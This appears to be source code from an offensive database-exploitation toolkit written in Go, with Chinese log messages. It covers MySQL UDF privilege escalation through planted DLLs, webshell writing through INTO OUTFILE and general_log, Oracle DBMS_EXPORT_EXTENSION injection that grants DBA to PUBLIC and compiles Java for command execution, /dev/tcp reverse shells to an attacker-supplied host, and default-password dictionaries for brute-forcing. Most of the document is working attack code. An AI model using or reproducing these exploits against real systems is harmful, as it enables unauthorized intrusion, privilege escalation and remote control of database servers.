Success(fmt.Sprintf("账号密码为:%s:%s", user, pass)) 39 | os.Exit(0) 40 | } else { 41 | fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass)) 42 | } 43 | } 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /pac/mysql_udf.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | "os" 7 | "strconv" 8 | "strings" 9 | ) 10 | 11 | var Win32dll = "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| var Win64dll = "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| var Linux32dll = "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" 14 | var Linux64dll = 
"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" 15 | 16 | // 获取pplugin路径 17 | func get_plugin(conn *sql.DB) (plugin_path string) { 18 | Info("获取Plugin路径") 19 | plugin, err := MysqlCMD("show variables like '%plugin%';", conn) 20 | if err != nil { 21 | Err(err) 22 | } 23 | 24 | if len(plugin) == 0 { 25 | Info("不存在plugin_dir") 26 | } else { 27 | for i, a := range plugin { 28 | if a["Variable_name"] == "plugin_dir" { 29 | plugin_path = fmt.Sprintf("%v", plugin[i]["Value"]) 30 | Info(fmt.Sprintf("Plugin路径为:%s", plugin_path)) 31 | } else { 32 | Info("不存在plugin_dir值,默认将dll导出为C:\\Windows\\System32\\") 33 | plugin_path = "" 34 | } 35 | } 36 | } 37 | return plugin_path 38 | } 39 | 40 | // 获取系统信息 41 | func get_compile(conn *sql.DB) (compile_version_string string, versioncompilemachine_value string) { 42 | Info("获取主机版本及架构") 43 | compile, err := MysqlCMD("show variables like '%compile%';", conn) 44 | if err != nil { 45 | Err(err) 46 | } 47 | 48 | versioncompilemachine_value = fmt.Sprintf("%s", compile[0]["Value"]) 49 | 50 | for i, j := range compile { 51 | if j["Variable_name"] == "version_compile_os" { 52 | compile_version := compile[i]["Value"] 53 | compile_version_string = fmt.Sprintf("%s", compile_version) 54 | Info(fmt.Sprintf("主机系统为:%v", compile_version_string)) 55 | } 56 | } 57 | return compile_version_string, versioncompilemachine_value 58 | } 59 | 60 | // 获取secur_file_priv信息 61 | func get_secure_file_priv(conn *sql.DB) (secure_file_priv string, result bool) { 62 | Info("判断是否存在secure_file_priv") 63 | m, err := MysqlCMD("SHOW VARIABLES LIKE '%secure%';", conn) 64 | if err != nil { 65 | //Err(err) 66 | Info("执行show variables like '%secure%'出错") 67 | os.Exit(1) 68 | } 69 | for i, Variable := range m { 70 | // Check the Variable_name field of each map 71 | if Variable["Variable_name"] == "secure_file_priv" { 72 | // fmt.Println("Variable found!") 73 | result = true 74 | secure_file_priv = fmt.Sprintf("%s", m[i]["Value"]) 75 | } else { 76 | result = false 77 | } 78 | 
} 79 | return secure_file_priv, result 80 | } 81 | 82 | func get_version(conn *sql.DB) (v float64) { 83 | m, err := MysqlCMD("select @@version;", conn) 84 | s := fmt.Sprintf("%s", m[0]["@@version"]) 85 | parts1 := strings.Split(s, ".") 86 | version := fmt.Sprintf("%s.%s", parts1[0], parts1[1]) 87 | v, err = strconv.ParseFloat(version, 64) 88 | if err != nil { 89 | fmt.Println(err) 90 | } 91 | 92 | return v 93 | } 94 | 95 | // udf提权具体步骤 96 | func Detail(conn *sql.DB, plugin_path string, dll string, udfname string, databasename string) { 97 | v := get_version(conn) 98 | Info("拼接dll数据") 99 | _, err0 := MysqlCMD(fmt.Sprintf("update %s.temp set data=concat(\"\",%s);", databasename, dll), conn) 100 | if err0 != nil { 101 | Info("拼接dll数据出错") 102 | os.Exit(1) 103 | } 104 | if v >= float64(5.1) { 105 | Info("导出dll") 106 | _, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile \"%s%s.dll\";", databasename, plugin_path, udfname), conn) 107 | if err != nil { 108 | Info("导出dll错误,可能不存在lib/plugin目录") 109 | Info("尝试通过utfs流创建lib/plugin目录") 110 | _, err := MysqlCMD(fmt.Sprintf("select '1' into dumpfile '%s::$INDEX_ALLOCATION'", plugin_path), conn) 111 | if err != nil { 112 | Info("通过ntfs流创建失败!") 113 | Info("导出dll失败!") 114 | Err(err) 115 | os.Exit(1) 116 | } 117 | } 118 | Info("创建sys_eval函数") 119 | _, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn) 120 | if err1 != nil { 121 | Info("创建动态链接库函数错误") 122 | Err(err1) 123 | os.Exit(1) 124 | } 125 | Info("执行whoami") 126 | whoamiresult, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn) 127 | if err2 != nil { 128 | Info("执行命令出错!") 129 | Err(err2) 130 | os.Exit(1) 131 | } 132 | fmt.Println(whoamiresult[0]["sys_eval('whoami')"]) 133 | MysqlCMDConsole(conn) 134 | DropSYSEVAL(conn) 135 | 136 | } else if v < float64(5.1) && v >= float64(5.0) { 137 | Info("导出dll") 138 | _, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile 
\"C:\\\\Windows\\\\System32\\\\%s.dll\"", databasename, udfname), conn) 139 | if err != nil { 140 | Info("导出dll失败!") 141 | Err(err) 142 | os.Exit(1) 143 | } 144 | Info("创建sys_eval函数") 145 | _, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn) 146 | if err1 != nil { 147 | Info("创建动态链接库函数错误!") 148 | Err(err1) 149 | os.Exit(1) 150 | } 151 | Info("执行whoami命令") 152 | whoamiresult, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn) 153 | if err2 != nil { 154 | Info("执行命令出错!") 155 | Err(err2) 156 | os.Exit(1) 157 | } 158 | fmt.Println(whoamiresult[0]["sys_eval('whoami')"]) 159 | MysqlCMDConsole(conn) 160 | DropSYSEVAL(conn) 161 | 162 | } else if v < float64(5.0) { 163 | _, err := MysqlCMD(fmt.Sprintf("select * from %s.temp into dumpfile \"C:\\Windows\\%s.dll\"", databasename, udfname), conn) 164 | if err != nil { 165 | Info("导出dll失败!") 166 | Err(err) 167 | os.Exit(1) 168 | } 169 | _, err1 := MysqlCMD(fmt.Sprintf("create function sys_eval returns string soname '%s.dll';", udfname), conn) 170 | if err1 != nil { 171 | Info("创建动态链接库函数错误!") 172 | Err(err1) 173 | os.Exit(1) 174 | } 175 | _, err2 := MysqlCMD(fmt.Sprintf("select sys_eval('whoami');"), conn) 176 | if err2 != nil { 177 | Info("执行命令出错!") 178 | Err(err2) 179 | os.Exit(1) 180 | } 181 | 182 | } else { 183 | Info("处理版本格式错误!无法进行判断") 184 | } 185 | } 186 | 187 | // 创建数据库、表 188 | func DataMethod(conn *sql.DB) (databasename string) { 189 | Info("创建数据库") 190 | databasename = RandStr(3) 191 | _, err1 := MysqlCMD(fmt.Sprintf("create database %s;", databasename), conn) 192 | if err1 != nil { 193 | Err(err1) 194 | Info("创建数据库出错!") 195 | //os.Exit(1) 196 | } 197 | 198 | Info("创建temp表") 199 | _, err2 := MysqlCMD(fmt.Sprintf("create table %s.temp(data longblob);", databasename), conn) 200 | if err2 != nil { 201 | Err(err2) 202 | Info("创建temp表出错!") 203 | os.Exit(1) 204 | } 205 | Info("插入数据") 206 | _, err3 := MysqlCMD(fmt.Sprintf("insert into %s.temp values(\"\");", 
databasename), conn) 207 | if err3 != nil { 208 | Err(err3) 209 | Info("插入数据出错!") 210 | os.Exit(1) 211 | } 212 | return databasename 213 | } 214 | 215 | // 系统判断完选择提权方式 216 | func UdfUdfPrivilegeDetail(conn *sql.DB, ostype string, plugin_path string) { 217 | udfname := RandStr(3) 218 | databasename := DataMethod(conn) 219 | 220 | if ostype == "Win32" { 221 | Detail(conn, plugin_path, Win32dll, udfname, databasename) 222 | } else if ostype == "Win64" { 223 | Detail(conn, plugin_path, Win64dll, udfname, databasename) 224 | } else if ostype == "Linux64" { 225 | Detail(conn, plugin_path, Linux64dll, udfname, databasename) 226 | } else if ostype == "Linux32" { 227 | Detail(conn, plugin_path, Linux32dll, udfname, databasename) 228 | } else { 229 | Info("错误,无法识别的数据库类型") 230 | } 231 | } 232 | 233 | // 通过系统判断 234 | func ChoiceDetail(conn *sql.DB, compile_version_string string, plugin_path string, versioncompilemachine_value string) { 235 | if strings.HasPrefix(compile_version_string, "Win") { 236 | parts := strings.Split(compile_version_string, "in") 237 | if fmt.Sprintf("%s", parts[1]) == "32" { 238 | UdfUdfPrivilegeDetail(conn, "Win32", plugin_path) 239 | } else if fmt.Sprintf("%s", parts[1]) == "64" { 240 | UdfUdfPrivilegeDetail(conn, "Win64", plugin_path) 241 | } else { 242 | Info("无法获取版本,只识别32和64位") 243 | } 244 | } else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(compile_version_string), "64") { 245 | UdfUdfPrivilegeDetail(conn, "Linux64", plugin_path) 246 | } else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(compile_version_string), "32") { 247 | UdfUdfPrivilegeDetail(conn, "Linux32", plugin_path) 248 | } else if strings.Contains(strings.ToLower(compile_version_string), "linux") && strings.Contains(strings.ToLower(versioncompilemachine_value), "64") { 249 | UdfUdfPrivilegeDetail(conn, "Linux64", plugin_path) 250 | } else if 
strings.Contains(strings.ToLower(compile_version_string), "linux") { 251 | UdfUdfPrivilegeDetail(conn, "Linux32", plugin_path) 252 | } else { 253 | Info("无法获取系统版本,只识别32和64") 254 | } 255 | 256 | } 257 | 258 | // 通过secure_file_priv判断 259 | func UdfPrivilege(conn *sql.DB) { 260 | // 获取secure_file_priv 261 | secure_file_priv, result := get_secure_file_priv(conn) 262 | if result == true { 263 | Info("存在secure_file_priv") 264 | if secure_file_priv == "NULL" { 265 | Info("secure_file_priv的值为NULL,不允许导入或导出") 266 | } else if secure_file_priv == "/" { 267 | Info("secure_file_priv的值为/,只允许在 / 目录导入导出") 268 | } else if len(fmt.Sprintf("%s", secure_file_priv)) == 0 { 269 | Info("secure_file_priv的值为空,不限制导入导出,可以尝试提权") 270 | // 获取Plugin路径 271 | plugin_path := get_plugin(conn) 272 | 273 | // 获取主机版本架构 274 | compile_version_string, versioncompilemachine_value := get_compile(conn) 275 | 276 | // 根据主机版本架构提权 277 | ChoiceDetail(conn, compile_version_string, plugin_path, versioncompilemachine_value) 278 | 279 | } else { 280 | Info("secure_file_priv的值不为NULL、空和\\,请手动尝试!") 281 | } 282 | } else { 283 | Info("不存在secure_file_priv,尝试提权") 284 | 285 | // 获取主机版本架构 286 | compile_version_string, versioncompilemachine_value := get_compile(conn) 287 | 288 | // 获取Plugin路径 289 | plugin_path := get_plugin(conn) 290 | 291 | // 根据主机版本架构提权 292 | ChoiceDetail(conn, compile_version_string, plugin_path, versioncompilemachine_value) 293 | } 294 | } 295 | 296 | func DropSYSEVAL(conn *sql.DB) { 297 | Info("执行完毕,删除sys_eval函数") 298 | _, err := MysqlCMD("drop FUNCTION sys_eval;", conn) 299 | if err != nil { 300 | Err(err) 301 | } 302 | } 303 | -------------------------------------------------------------------------------- /pac/mysql_webshell.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | ) 7 | 8 | func Webshell_IntoOutFile(conn *sql.DB, path string) { 9 | Info("\n1、知道网站物理路径\n2、高权限数据库用户\n3、load_file() 开启 即 
secure_file_priv 无限制\n4、网站路径有写入权限") 10 | m, err := MysqlCMD("show global variables like '%secure_file_priv%';", conn) 11 | if err != nil { 12 | Err(err) 13 | } 14 | fmt.Printf("%v\n", m[0]["Value"]) 15 | secure_file_priv := fmt.Sprintf("%v", m[0]["Value"]) 16 | //fmt.Printf("%T", secure_file_priv) 17 | if secure_file_priv == "NULL" { 18 | Info("secure_file_priv的值为NULL,不允许导入或导出") 19 | } else if secure_file_priv == "/" { 20 | Info("secure_file_priv的值为/,只允许在 / 目录导入导出") 21 | } else if secure_file_priv == "" { 22 | Info("secure_file_priv的值为空,不限制导入导出,尝试写webshell,默认写冰蝎3.0php,默认密钥") 23 | a := fmt.Sprintf("select '' into outfile '%s'", path) 24 | Info(a) 25 | MysqlCMD(a, conn) 26 | } else { 27 | Info("secure_file_priv的值不为NULL,/和空,请手动尝试!") 28 | } 29 | } 30 | 31 | func Webshell_logshell(conn *sql.DB, path string) { 32 | Info("\n1、数据库为 root 权限\n2、Web 目录可写\n3、知道 Web 的物理绝对路径") 33 | m, err := MysqlCMD("SHOW VARIABLES LIKE '%general%';", conn) 34 | if err != nil { 35 | Err(err) 36 | } 37 | fmt.Printf("%v\n", m[0]["Value"]) 38 | fmt.Sprintf("%v\n", m[0][""]) 39 | Info("执行set global general_log = \"ON\";开启general_log") 40 | MysqlCMD("set global general_log = \"ON\";", conn) 41 | // set global general_log_file='c:/phpstudy_pro/www/shell.php'; 42 | a := fmt.Sprintf("set global general_log_file='%s';", path) 43 | Info("执行set global general_log_file='c:/phpstudy_pro/www/shell.php';修改general_log_file路径") 44 | MysqlCMD(a, conn) 45 | Info("尝试写入webshell") 46 | b := fmt.Sprintf("select ''") 47 | MysqlCMD(b, conn) 48 | Success("执行完成,请尝试连接webshell,默认3.0冰蝎,默认密钥") 49 | 50 | } 51 | -------------------------------------------------------------------------------- /pac/oracl_xmlquery.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | func OracleXMLQuery(conn *sql.DB) { 12 | 13 | _, err := OracleCMD(fmt.Sprintf("select dbms_xmlquery.newcontext('declare 
PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual"), conn) 14 | if err != nil { 15 | Err(err) 16 | } 17 | 18 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''YY'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 19 | if err != nil { 20 | Err(err) 21 | } 22 | 23 | _, err = OracleCMD(fmt.Sprintf("select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual"), conn) 24 | if err != nil { 25 | Err(err) 26 | } 27 | 28 | _, err = OracleCMD(fmt.Sprintf("select OBJECT_ID from all_objects where object_name ='LINXRUNCMD'"), conn) 29 | if err != nil { 30 | Err(err) 31 | } 32 | } 33 | 34 | func OracleXMLQueryConsole(conn *sql.DB) { 35 | Info("执行系统命令") 36 | OracleXMLQuery(conn) 37 | reader := bufio.NewReader(os.Stdin) 38 | for { 39 | var cmd string 40 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 41 | cmd, _ = reader.ReadString('\n') 42 | cmd = strings.TrimRight(cmd, "\r\n") 43 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 44 | break 45 | } 46 | resultSet, err := OracleCMD(fmt.Sprintf("select 
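// DropFucnction drops the LinxRunCMD PL/SQL function from the connected
// Oracle database and logs the outcome.
//
// Only the function is dropped. The "LinxUtil" Java source and the
// dbms_java.grant_permission call issued by the setup code earlier in this
// file (presumably OracleXMLQuery) are not reverted here, so a database this
// was run against still carries those objects afterwards. Cleanup or
// incident review should check for them as well.
func DropFucnction(conn *sql.DB) {
	Info("卸载命令执行函数")
	if _, err := OracleCMD("drop function LinxRunCMD", conn); err != nil {
		Err(err)
		// Do not report success when the DROP statement failed.
		return
	}
	// NOTE(review): OracleCMD logs a failed query itself and then returns a
	// nil error, so reaching this line does not prove the function is gone;
	// confirm against all_objects.
	Success("卸载成功")
}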
// OracleConnect opens a godror handle for ruser/pwd against rhost:rport/sid
// and verifies it with Ping.
//
// On success it returns the handle, a nil error and sign == true. On any
// failure the error is logged through Err and the function returns
// (nil, nil, false), so callers can only detect failure through sign; the
// error value itself is never propagated.
//
// NOTE(review): pwd is wrapped in double quotes in the connection string but
// is not escaped, so a password containing a double quote ends the quoted
// value early.
// NOTE(review): when Ping fails the handle returned by sql.Open is dropped
// without Close.
func OracleConnect(ruser string, pwd string, rhost string, rport string, sid string) (conn *sql.DB, err error, sign bool) {
	dsn := fmt.Sprintf(`user=%s password="%s" connectString="%s:%s/%s"`, ruser, pwd, rhost, rport, sid)
	if conn, err = sql.Open("godror", dsn); err != nil {
		Err(err)
		return nil, nil, false
	}
	if err = conn.Ping(); err != nil {
		Err(err)
		return nil, nil, false
	}
	Info("Oracle数据库连接成功")
	return conn, nil, true
}
fmt.Println(fmt.Sprintf("%s:%s 未成功爆破出账号密码", user, pass)) 43 | } 44 | } 45 | } 46 | } 47 | -------------------------------------------------------------------------------- /pac/oracle_export_extension.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "bufio" 5 | "database/sql" 6 | "fmt" 7 | "os" 8 | "strings" 9 | ) 10 | 11 | // GET_DOMAIN_INDEX_TABLES注入 12 | func OracleExportExtension(conn *sql.DB) { 13 | 14 | _, err := OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 15 | if err != nil { 16 | Err(err) 17 | } 18 | 19 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"LinxUtil\" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str=\"\";while ((stemp = myReader.readLine()) != null) str +=stemp+\"\\n\";myReader.close();return str;} catch (Exception e){return e.toString();}}}'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn) 20 | if err != nil { 21 | Err(err) 22 | } 23 | 24 | _, err = OracleCMD(fmt.Sprintf("select 
SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''',''''''''<>'''''''', ''''''''execute'''''''');end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 25 | if err != nil { 26 | Err(err) 27 | } 28 | 29 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn) 30 | if err != nil { 31 | Err(err) 32 | } 33 | 34 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual\n"), conn) 35 | if err != nil { 36 | Err(err) 37 | } 38 | } 39 | 40 | func OracleExportExtensionConsole(conn *sql.DB) { 41 | 42 | Info("执行系统命令") 43 | OracleExportExtension(conn) 44 | reader := bufio.NewReader(os.Stdin) 45 | for { 46 | var cmd string 47 | fmt.Printf("%s:%s> $ ", Rhost, Rport) 48 | cmd, _ = reader.ReadString('\n') 49 | cmd = strings.TrimRight(cmd, "\r\n") 50 | if cmd == "exit" || cmd == "q" || cmd == "quit" { 51 | break 52 | } 53 | resultSet, err := OracleCMD(fmt.Sprintf("select sys.LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn) 54 | for _, m := range resultSet { 55 | for _, value := range m { 56 | fmt.Println(fmt.Sprintf("%s", value)) 57 | } 58 | } 59 | if err != nil { 60 | Err(err) 61 | } 62 | } 63 | } 64 | 65 | func OracleExportExtensionCMD(cmd string, conn 
*sql.DB) { 66 | Info("执行系统命令") 67 | OracleExportExtension(conn) 68 | resultSet, err := OracleCMD(fmt.Sprintf("select sys.LinxRunCMD('/bin/bash -c /usr/bin/%s') from dual", cmd), conn) 69 | for _, m := range resultSet { 70 | for _, value := range m { 71 | fmt.Println(fmt.Sprintf("%s", value)) 72 | } 73 | } 74 | if err != nil { 75 | Err(err) 76 | } 77 | } 78 | 79 | // 利用DBMS_EXPORT_EXTENSION注入漏洞反弹shell 80 | func OracleExportExtensionReverse(conn *sql.DB, Lhost string, Lport string) { 81 | 82 | _, err := OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named \"shell\" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={\"/bin/bash\",\"-c\",\"exec 9<> /dev/tcp/%s/%s;exec 0<&9;exec 1>&9 2>&1;/bin/sh\"};Process p=Runtime.getRuntime().exec(aaa);}}'''';END;'';END;--','SYS',0,'1',0) from dual", Lhost, Lport), conn) 83 | if err != nil { 84 | Err(err) 85 | } 86 | 87 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.net.SocketPermission'''''''', ''''''''<>'''''''', ''''''''*'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 88 | if err != nil { 89 | Err(err) 90 | } 91 | 92 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String''''''''; '''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 93 | if err != nil { 
94 | Err(err) 95 | } 96 | 97 | _, err = OracleCMD(fmt.Sprintf("select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT\" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on reversetcp to public'''';END;'';END;--','SYS',0,'1',0) from dual"), conn) 98 | if err != nil { 99 | Err(err) 100 | } 101 | 102 | _, err = OracleCMD(fmt.Sprintf("select sys.reversetcp from dual"), conn) 103 | if err != nil { 104 | Err(err) 105 | } 106 | 107 | } 108 | -------------------------------------------------------------------------------- /pac/oracle_funcall.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | ) 7 | 8 | func OracleFuncCallReverse(conn *sql.DB, Lhost string, Lport string) { 9 | Info("通过dbms_java_test.funcall()反弹shell") 10 | _, err := OracleCMD(fmt.Sprintf("Select DBMS_JAVA_TEST.FUNCALL('oracle/aurora/util/Wrapper','main','/bin/bash','-c','exec 9<> /dev/tcp/%s/%s;exec 0<&9;exec 1>&9 2>&1;/bin/bash') from dual ", Lhost, Lport), conn) 11 | if err != nil { 12 | Err(err) 13 | } 14 | Info("请查看是否收到shell") 15 | } 16 | -------------------------------------------------------------------------------- /pac/other.go: -------------------------------------------------------------------------------- 1 | package pac 2 | 3 | import ( 4 | "database/sql" 5 | "fmt" 6 | "math/rand" 7 | "time" 8 | ) 9 | 10 | var Userdict = map[string][]string{ 11 | "mysql": {"root", "mysql"}, 12 | "mssql": {"sa", "sql"}, 13 | "postgresql": {"postgres", "admin"}, 14 | "oracle": {"system", "sys", "admin", "test", "web", "orcl"}, 15 | "redis": {"redis"}, 16 | } 17 | 18 | var Passwords = []string{"123456", "admin", "admin123", "root", "", "pass123", "pass@123", "password", "123123", "654321", "111111", "123", "1", "admin@123", "Admin@123", "admin123!@#", "{user}", "{user}1", "{user}111", "{user}123", "{user}@123", "{user}_123", 
// RandStr returns a string of length characters drawn from the ASCII letters
// a-z and A-Z. A length of zero or less yields the empty string.
//
// The package-level math/rand source is reseeded from the wall clock on every
// call. math/rand is not a cryptographic generator and the seed is derived
// from the current time, so the output is predictable and must not be used as
// a secret or an unguessable identifier.
func RandStr(length int) string {
	const letters = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"

	rand.Seed(time.Now().UnixNano() + int64(rand.Intn(100)))

	var picked []byte
	for remaining := length; remaining > 0; remaining-- {
		picked = append(picked, letters[rand.Intn(len(letters))])
	}
	return string(picked)
}
// postgrecmd runs sqlstr on conn, prints every returned cell on its own line
// and returns the rows as a slice of column-name -> value maps.
//
// The statement is passed to conn.Query verbatim with no bind parameters, so
// any quoting of values is entirely the caller's responsibility.
//
// The returned error is always nil: a failed Query is logged through Err and
// reported as (nil, nil), while failures in Columns, Scan or row iteration
// end the process through log.Fatal, which also skips the deferred
// rows.Close.
func postgrecmd(sqlstr string, conn *sql.DB) ([]map[string]interface{}, error) {
	rows, queryErr := conn.Query(sqlstr)
	if queryErr != nil {
		Err(queryErr)
		return nil, nil
	}
	defer rows.Close()

	records := []map[string]interface{}{}
	for rows.Next() {
		names, colErr := rows.Columns()
		if colErr != nil {
			log.Fatal(colErr)
		}

		// Scan needs one destination pointer per column.
		cells := make([]interface{}, len(names))
		targets := make([]interface{}, 0, len(names))
		for idx := range cells {
			targets = append(targets, &cells[idx])
		}
		if scanErr := rows.Scan(targets...); scanErr != nil {
			log.Fatal(scanErr)
		}

		record := make(map[string]interface{}, len(names))
		for idx, name := range names {
			record[name] = cells[idx]
		}
		records = append(records, record)
	}
	if iterErr := rows.Err(); iterErr != nil {
		log.Fatal(iterErr)
	}

	// Map iteration order is random, so cells of one row print in no fixed
	// column order.
	for _, record := range records {
		for _, cell := range record {
			fmt.Printf("%s\n", cell)
		}
	}
	return records, queryErr
}
// postgre_connect opens a lib/pq handle to the package-level dbname database
// on Rhost:Rport as Ruser/PWD and verifies it with Ping.
//
// It returns the handle and true on success. On failure the error is logged
// through Err and (nil, false) is returned.
//
// NOTE(review): the connection string hard-codes sslmode=disable, so the
// credentials and all query traffic cross the network without TLS.
// NOTE(review): the values are interpolated without quoting; a value that
// contains a space or quote changes how the key=value string is parsed.
// NOTE(review): when Ping fails the handle returned by sql.Open is dropped
// without Close.
func postgre_connect(Rhost string, Rport string, Ruser string, PWD string) (conn *sql.DB, sign bool) {
	dsn := fmt.Sprintf("host=%s port=%s user=%s password=%s dbname=%s sslmode=disable", Rhost, Rport, Ruser, PWD, dbname)

	handle, openErr := sql.Open("postgres", dsn)
	if openErr != nil {
		Err(openErr)
		return nil, false
	}
	if pingErr := handle.Ping(); pingErr != nil {
		Err(pingErr)
		return nil, false
	}

	Success("连接成功")
	return handle, true
}
